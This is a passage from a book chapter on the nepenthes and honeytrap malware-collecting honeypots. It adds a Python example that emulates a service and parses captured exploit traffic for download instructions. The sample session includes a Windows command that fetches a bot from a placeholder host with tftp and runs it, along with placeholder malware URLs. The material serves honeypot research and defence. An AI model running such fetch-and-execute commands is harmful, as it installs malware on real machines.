
6.5. Summary

In this chapter, we have introduced the virtual honeypot tools nepenthes and honeytrap. These low-interaction honeypots allow us to learn more about autonomous spreading malware. The basic principle behind these tools is simple: we emulate only the parts of a service that an exploit actually uses. By implementing this emulation carefully, we can extract enough information from an incoming exploit to learn how the malware propagates, which in turn lets us download the malware automatically. We have thus applied the basic principle of honeypots and are now able to collect malware automatically in a nonnative environment: nepenthes and honeytrap run on Linux and BSD systems, so a downloaded bot written for Windows cannot harm the collecting machine. Our empirical results show that this approach is viable, and we have presented the lessons learned during development and testing.
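The principle summarized above, as an added example that is not code from the book or from the nepenthes or honeytrap projects: a toy "vulnerability module" that answers a client with canned bytes instead of running a real service, records everything the client sends, and then parses (never executes) the captured payload for download instructions. The service banner, the reply table, the attacker session and the hosts (203.0.113.x, evil.example) are all constructed for the example and are not taken from the chapter.

```python
"""Added example: a low-interaction collector in miniature.

The honeypot does not run the vulnerable service. It replies with just enough
canned protocol to keep an exploit talking, keeps a copy of everything sent,
and then extracts the download instructions from the captured bytes. The
payload is parsed, never executed, so a Windows bot cannot harm the Linux/BSD
collector. All names, addresses and the session below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class DownloadIntent:
    """Where the captured payload says the malware binary can be fetched from."""
    scheme: str
    host: str
    port: int
    path: str


# Two download forms commonly found in autonomous-spreading payloads:
#   1. a plain URL (http/https/ftp/tftp)
#   2. a Windows 'tftp [-i] HOST get FILE' command line
_URL_RE = re.compile(
    rb"(?P<scheme>https?|ftp|tftp)://(?P<host>[0-9A-Za-z.\-]+)"
    rb"(?::(?P<port>\d{1,5}))?(?P<path>/[^\s\"'<>&|;]*)?"
)
_TFTP_CMD_RE = re.compile(
    rb"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[0-9A-Za-z.\-]+)\s+get\s+(?P<file>[^\s&|;\"']+)",
    re.IGNORECASE,
)
_DEFAULT_PORT = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}


def extract_download_intents(payload: bytes) -> list[DownloadIntent]:
    """Parse the payload for download targets; URL forms first, then tftp commands.

    Duplicates are dropped so one exploit that repeats its URL yields one fetch.
    """
    found: list[DownloadIntent] = []
    for m in _URL_RE.finditer(payload):
        scheme = m["scheme"].decode()
        port = int(m["port"].decode()) if m["port"] else _DEFAULT_PORT[scheme]
        path = (m["path"] or b"/").decode()
        found.append(DownloadIntent(scheme, m["host"].decode(), port, path))
    for m in _TFTP_CMD_RE.finditer(payload):
        found.append(DownloadIntent("tftp", m["host"].decode(), 69, "/" + m["file"].decode()))
    seen: set[DownloadIntent] = set()
    unique: list[DownloadIntent] = []
    for intent in found:
        if intent not in seen:
            seen.add(intent)
            unique.append(intent)
    return unique


class EmulatedService:
    """Minimal vulnerability module: canned replies, full capture, no real service.

    `replies` maps a request prefix to a fixed answer. Anything unrecognised is
    swallowed with an empty reply, so the exploit believes it succeeded and
    keeps sending the payload we want to capture.
    """

    def __init__(self, banner: bytes, replies: dict[bytes, bytes]):
        self.banner = banner
        self.replies = replies
        self.captured = bytearray()

    def on_connect(self) -> bytes:
        return self.banner

    def feed(self, data: bytes) -> bytes:
        self.captured += data
        for prefix, reply in self.replies.items():
            if data.startswith(prefix):
                return reply
        return b""


def make_demo_service() -> EmulatedService:
    """Constructed fake 'FOO' service; the protocol is invented for this example."""
    return EmulatedService(b"220 FOO service ready\r\n", {b"HELO": b"250 OK\r\n"})


# Constructed attacker session: greeting, a NOP-sled-like blob carrying a tftp
# command, and a second chunk with alternate URLs. Nothing here is real malware.
SAMPLE_SESSION = [
    b"HELO bot\r\n",
    b"EXPLOIT " + b"\x90" * 32 + b"cmd /c tftp -i 203.0.113.5 get bot.exe & bot.exe\x00",
    b"ALT http://203.0.113.7:8080/dl/x.exe ftp://evil.example/bin/x.exe\r\n",
]


def collect(session: list[bytes], svc: EmulatedService) -> list[DownloadIntent]:
    """Replay a session against the emulator and harvest its download intents."""
    svc.on_connect()
    for chunk in session:
        svc.feed(chunk)
    return extract_download_intents(bytes(svc.captured))


if __name__ == "__main__":
    for intent in collect(SAMPLE_SESSION, make_demo_service()):
        print(intent)
```

The intents returned by `collect` are what a real collector would hand to a separate, sandboxed fetcher; the emulator itself only ever reads bytes, which is the property that keeps a Windows-targeted binary harmless on the Linux or BSD host.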
